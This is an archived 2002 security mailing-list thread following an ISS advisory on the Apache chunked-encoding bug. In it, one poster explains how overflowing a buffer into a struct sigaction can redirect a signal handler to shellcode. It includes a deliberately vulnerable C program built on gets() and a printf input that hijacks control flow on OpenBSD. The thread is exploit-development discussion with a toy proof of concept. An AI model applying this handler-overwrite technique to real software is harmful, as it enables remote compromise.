FW: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server

From: Peter Werner (Peter.Wernerat_private)
Date: Wed Jun 19 2002 - 08:50:13 PDT

  • Next message: Michael Wojcik: "RE: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server"

    fowarded
    
    > -----Original Message-----
    > From: Peter Werner 
    > Sent: Wednesday, June 19, 2002 4:38 PM
    > To: 'KF'
    > Subject: RE: ISS Advisory: Remote Compromise Vulnerability in Apache
    > HTTP Server
    > 
    > 
    > theres no papers that i know of, just an unfortunate 
    > knowledge of signals on my part, i really should get out more.
    > 
    > this should help a bit:
    > 
    > #include <sys/types.h>
    > #include <signal.h>
    > #include <stdio.h>
    > #include <unistd.h>
    > 
    > void hello(void);
    > void func(void);
    > 
    > int
    > main(void)
    > {
    >         printf("main %p, func %p, hello %p\n", main, func, hello);
    > 
    >         func();
    > 
    >         printf("main says good bye\n");
    >         return(0);
    > 
    > }
    > 
    > void
    > func(void)
    > {
    >         struct sigaction new;
    >         char buf[8];
    > 
    >         memset(&new, 0, sizeof(struct sigaction));
    > 
    >         gets(buf);
    > 
    >         sigaction(SIGUSR1, &new, NULL);
    > 
    >         kill(getpid(), SIGUSR1);
    > }
    > 
    > void
    > hello(void)
    > {
    >         printf("hello world!\n");
    > }
    > 
    > this is on intel openbsd
    > 
    > [phf|sig]$ cc -o vuln vuln.c
    > vuln.c:29: warning: gets() is very unsafe; consider using fgets()
    > [phf|sig]$ ./vuln
    > main 0x17c8, func 0x180c, hello 0x186c
    > hi	<-- type some input
    > User defined signal 1
    > [phf|sig]$
    > 
    > so hello is at 0x186c. we will overflow buf (8 bytes) then 
    > the start of the struct sigaction with the address we want to 
    > jump to 0x186c (this would be the address of the shellcode in 
    > a real exploit)
    > 
    > [phf|sig]$ printf "AAAAAAAA\x6c\x18" |./vuln
    > main 0x17c8, func 0x180c, hello 0x186c
    > hello world!
    > main says good bye
    > [phf|sig]$
    > 
    > for reference, struct sigaction is defined on openbsd as follows
    > 
    > struct  sigaction {
    >         union {         /* signal handler */
    >                 void    (*__sa_handler)(int);
    >                 void    (*__sa_sigaction)(int, siginfo_t *, void *);
    >         } __sigaction_u;
    >         sigset_t sa_mask;               /* signal mask to apply */
    >         int     sa_flags;               /* see signal options below */
    > };
    > 
    > so in the exploit we overwrite the function pointer 
    > (__sa_handler) which will be installed in sigaction() call. 
    > im pretty sure (but not 100%) that the sigaction call has to 
    > come after the overflow. pretty simple really. 
    > 
    > -pete
    > -----Original Message-----
    > From: KF [mailto:dotslashat_private]
    > Sent: Wednesday, June 19, 2002 3:50 AM
    > To: Peter Werner
    > Subject: Re: ISS Advisory: Remote Compromise Vulnerability in Apache
    > HTTP Server
    > 
    > 
    > Great ... thats what I was looking for ... I certainly appreciate the 
    > help.  Any ideas on how to properly execute this theory? Any 
    > papers out 
    > there anywhere?
    > -KF
    > 
    > 
    > Peter Werner wrote:
    > 
    > >sigaction adds a new signal handler while saving the old 
    > handler, its used
    > >in libraries and stuff that want to handle certain signals 
    > and also pass
    > >them on to the user process that called the library 
    > function. on openbsd the
    > >first entry in struct sigaction is the function pointer, on 
    > solaris 7 its
    > >the second (comes after an int).  so in theory you could 
    > overwrite that
    > >function pointer in act with the address of your shellcode 
    > and post the
    > >correct signal to that process which would jump to the shellcode. 
    > >
    > >-pete
    > >
    > >-----Original Message-----
    > >From: KF [mailto:dotslashat_private]
    > >Sent: Tuesday, June 18, 2002 8:18 AM
    > >To: vuln-devat_private
    > >Subject: Re: ISS Advisory: Remote Compromise Vulnerability in Apache
    > >HTTP Server
    > >
    > >
    > >During some testing of the apache issues with chunked 
    > encoding I noted 
    > >that on my Linux x86 based install of apache just before the child 
    > >process exits
    > >some of the arguments that are passed to int sigaction(int signum,  
    > >const  struct  sigaction  *act, struct sigaction *oldact);  and  int 
    > >sigemptyset(sigset_t *set); have had their arguments 
    > overwritten... in 
    > >the case of sigaction the signum was set to 10 or SIGUSR1 
    > and all other 
    > >arguments were overwritten with  0x41414141  I was wondering if this 
    > >could cause any added risk to the x86 versions of apache... 
    > maybe some 
    > >signaling ninja would help?
    > >
    > >The description of sigaction is really what caught my attention:
    > >
    > >The sigaction system call is used  to  change  the  action  
    > taken by a 
    > >process on receipt of a specific signal.
    > >
    > >-KF
    > >
    > >
    > 
    > 
    > 
    



    This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 13:06:20 PDT